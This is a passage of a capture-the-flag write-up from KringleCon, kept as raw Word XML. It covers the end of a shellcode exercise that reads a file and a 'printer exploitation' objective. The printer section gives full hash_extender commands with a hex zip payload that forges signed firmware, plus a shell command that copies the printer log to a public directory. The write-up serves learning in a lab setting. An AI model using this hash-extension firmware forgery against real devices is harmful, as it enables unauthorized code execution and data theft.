        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rsi,0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B870B4" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC882C8" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D4E00E1" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; TODO: Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the file handle and read it into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3484A9DB" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi,rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6075029C" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rax,0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F20287" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsi,rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76579F13" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rdx,140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E9849" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05A4F014" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; TODO: Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys_write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to write the contents from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AF4A7" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rax,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA865CA" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rdi,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955B5EB" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsi,rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6830F9C5" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rdx,140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EAEF15" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E2BD6B" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; TODO: Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys_exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09895B9C" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rax,60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C29D0" w14:textId="77777777" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>mov rdi,0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB88F7F" w14:textId="64A4040D" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="033C5D43" w14:textId="3DD29474" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="00284E5F"/>
    <w:p w14:paraId="5295FA10" w14:textId="1349E92E" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="00284E5F">
      <w:r>
        <w:t xml:space="preserve">After running the shellcode, we can view the contents of the text file in memory: </w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve">Secret to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00284E5F">
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve"> success: all of our speakers and organizers, providing the gift of </w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cyber security</w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>knowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t>, free to the community.</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BFCC4" w14:textId="1DE6AF02" w:rsidR="00284E5F" w:rsidRDefault="00284E5F" w:rsidP="00284E5F">
      <w:r>
        <w:t>However, after running the shellcode, from a terminal in Jack Frost’s tower no less, I felt this was a little less of a tutorial and more of an Ender’s Game scenario. Oops!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1EF6EF" w14:textId="184F33E8" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Objective 7 – Printer Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97E9EA" w14:textId="3E2070F6" w:rsidR="00853B73" w:rsidRDefault="00284E5F">
      <w:r>
        <w:t xml:space="preserve">To solve this challenge, we are asked to </w:t>
      </w:r>
      <w:r w:rsidR="00413F94">
        <w:t xml:space="preserve">read </w:t>
      </w:r>
      <w:r w:rsidR="00413F94" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/var/spool/printer.log</w:t>
      </w:r>
      <w:r w:rsidR="00413F94">
        <w:t xml:space="preserve"> on a printer that was stolen from Kringle Castle to </w:t>
      </w:r>
      <w:r>
        <w:t>discover the name of the last file printed with an .xlsx extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ADB60D" w14:textId="193D1919" w:rsidR="00284E5F" w:rsidRDefault="00413F94">
      <w:r>
        <w:t xml:space="preserve">We’re provided </w:t>
      </w:r>
      <w:r w:rsidR="00E20C7A">
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> useful hints: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C519E" w14:textId="4E26CBBB" w:rsidR="00413F94" w:rsidRDefault="00413F94" w:rsidP="00413F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We should be taking a look at the printer’s firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162A79E" w14:textId="4526CE56" w:rsidR="00413F94" w:rsidRDefault="00413F94" w:rsidP="00413F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We should look into Hash Extension Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC68DD5" w14:textId="7B2A1694" w:rsidR="00E20C7A" w:rsidRDefault="00E20C7A" w:rsidP="00413F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On the topic of firmware, if “you append multiple files of that type, the last one is processed”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BFC35" w14:textId="675BE488" w:rsidR="00413F94" w:rsidRDefault="00413F94" w:rsidP="00413F94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We can access files placed in</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> /app/lib/public/incoming </w:t>
      </w:r>
      <w:r>
        <w:t>at https://printer.kringlecastle.com/incoming/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB1B49" w14:textId="2A12EDD5" w:rsidR="00284E5F" w:rsidRDefault="00413F94">
      <w:r>
        <w:t xml:space="preserve">First, I accessed the printer controller panel at </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://printer.kringlecastle.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Most functions are locked behind authentication, but there is a page to upload new firmware (as well as download the current firmware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333ACCE9" w14:textId="61E439E3" w:rsidR="00413F94" w:rsidRDefault="00413F94">
      <w:r>
        <w:t>The firmware is in json format—first, the firmware as a base64 encoded string, a “secret length,” and a sha256 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DAEE2" w14:textId="268F6A3A" w:rsidR="00413F94" w:rsidRDefault="00413F94">
      <w:r>
        <w:t xml:space="preserve">First, I </w:t>
      </w:r>
      <w:r w:rsidR="00950057">
        <w:t xml:space="preserve">decoded the base64 string to a file. It was a zip file containing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00950057" w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00950057">
        <w:t>. The resulting file does not match the hash in the json file. Initially, I unzipped the bin and started going through the different code files to see if there was anything obvious that could help me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAEC77" w14:textId="7B948609" w:rsidR="00950057" w:rsidRDefault="00950057">
      <w:r>
        <w:t xml:space="preserve">The firmware itself did not help, however, given the hint about the hash extension and the fact that the SHA256 hash does not match the provided firmware, I began to look more into the hash extension attacks with the tool and writeup in Ruby </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cyster’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hint: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/iagox86/hash_extender</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="040631A1" w14:textId="0E154BBE" w:rsidR="00950057" w:rsidRDefault="00E20C7A">
      <w:r>
        <w:t>The gist appears to be that the hash does not match because a secret is appended to the firmware then hashed. The printer knows the secret and can validate the secret + payload to match the hash in the file. However, due to a weakness in how all this works, it is possible to append data to the payload and generate a new, valid hash without requiring the secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62078187" w14:textId="563913CD" w:rsidR="00E20C7A" w:rsidRDefault="00DE3F4B">
      <w:r>
        <w:t xml:space="preserve">Based on the way that hash extension attacks work, we can’t do anything with the original firmware—however, we should be able to append a whole new zip file onto the first using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hash_extender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9958F" w14:textId="20E405F0" w:rsidR="00DE3F4B" w:rsidRDefault="00DE3F4B">
      <w:r>
        <w:t>First, I made a file called “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>henlo.sh</w:t>
      </w:r>
      <w:r>
        <w:t>” with a single, lazy command “</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>cp /var/spool/printer.log /app/lib/public/incoming/henlo.log”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and zipped it. I converted the zip file to hex format to work with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hash_extender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. My first attempt looked like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C48D7E" w14:textId="60F106CF" w:rsidR="00DE3F4B" w:rsidRDefault="00DE3F4B" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE3F4B">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE3F4B">
        <w:t>hash_extender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE3F4B">
        <w:t xml:space="preserve"> --file work/original --signature 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --append=504b0304140000000800278393539c8b3f493b0000003d0000000a001c00617070656e645f636d64555409000349b1bf6149b1bf6175780b000104e803000004e803000015cac90d80300c04c03f55a402b6a6c48a82a5c55e99a37ec4bcc7d4f0f6c2a54c42e571cfda99aba14ba00fe819748387e5e9b170cc60fe65fb00504b01021e03140000000800278393539c8b3f493b0000003d0000000a0018000000000001000000ff8100000000617070656e645f636d64555405000349b1bf6175780b000104e803000004e8030000504b05060000000001000100500000007f0000000000 --append-format=hex --format=sha256 --secret=16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F2026" w14:textId="08A10955" w:rsidR="00DE3F4B" w:rsidRDefault="00DE3F4B"/>
    <w:p w14:paraId="07B0960D" w14:textId="6E4E2148" w:rsidR="00B532EB" w:rsidRDefault="00DE3F4B">
      <w:r>
        <w:t xml:space="preserve">This gave me a new hash for the json and the new hex content. I converted the hex back to a real file. I could unzip the file—it was the original </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, but it complained about leftover data (which would be my second zip file payload). I converted the file to b64 and put the new encoded firmware and hash into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>firmware.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and attempted an upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421BA56" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Something went wrong!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF664E2" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Firmware update failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138924AC" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5083A0" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Failed to parse the ZIP file: Could not extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the archive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED639E3" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B778C1D" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>$ unzip '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/20211219-1-1nk52wc' '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' -d '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/20211219-1-1nk52wc-out' 2&gt;&amp;1 &amp;&amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/20211219-1-1nk52wc-out/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5446F56C" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4142159D" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Archive:  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/20211219-1-1nk52wc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F43F8A9" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>warning [/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/20211219-1-1nk52wc]:  2608 extra bytes at beginning or within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zipfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DA72FF5" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  (attempting to process anyway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702096AB" w14:textId="09EDBC0A" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">caution: filename not matched:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00537C31" w14:textId="1DD00BE4" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB"/>
    <w:p w14:paraId="5164E420" w14:textId="159AC4AF" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB">
      <w:r>
        <w:t xml:space="preserve">Turns out, the file can’t just have any name—the payload we want to run has to be titled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>firmware.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The filename is present in the zip file information, so changing that data is going to change the payload and hash. I redid the steps after renaming my file: zip, convert to hex, push through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hash_extender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, test the output file, encode the output file, update the json with the new payload and hash, and upload.</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> Phew! Take a deep breath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B5F99" w14:textId="7FAAD418" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB">
      <w:r>
        <w:t xml:space="preserve">The following command was successful: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57979DAB" w14:textId="2FFC3AFC" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00B532EB">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B532EB">
        <w:t>hash_extender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B532EB">
        <w:t xml:space="preserve"> --file work/original --signature 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --append=504b0304140000000800858693539c8b3f493b0000003d0000000c001c006669726d776172652e62696e555409000399b7bf6199b7bf6175780b000104e803000004e803000015cac90d80300c04c03f55a402b6a6c48a82a5c55e99a37ec4bcc7d4f0f6c2a54c42e571cfda99aba14ba00fe819748387e5e9b170cc60fe65fb00504b01021e03140000000800858693539c8b3f493b0000003d0000000c0018000000000001000000ff81000000006669726d776172652e62696e555405000399b7bf6175780b000104e803000004e8030000504b0506000000000100010052000000810000000000 --append-format=hex --format=sha256 --secret=16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123AFC6A" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00B532EB"/>
    <w:p w14:paraId="39DCF040" w14:textId="1176B644" w:rsidR="00B532EB" w:rsidRDefault="00A81A30" w:rsidP="00B532EB">
      <w:r>
        <w:t>I amended the firmware with the new outputs (full copy available in the appendix as “Signed Printer Firmware”) and reuploaded it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB726AB" w14:textId="377000AD" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="00B532EB">
      <w:r>
        <w:t xml:space="preserve">The printer’s control panel said the upload was successful, so I visited </w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:t>https://printer.kringlecastle.com/incoming/henlo.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and was able to view the output of my firmware’s command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58343C38" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Documents queued for printing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7120C" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>=============================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C512B" w14:textId="77777777" w:rsidR="00B532EB" w:rsidRDefault="00B532EB" w:rsidP="0094724D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
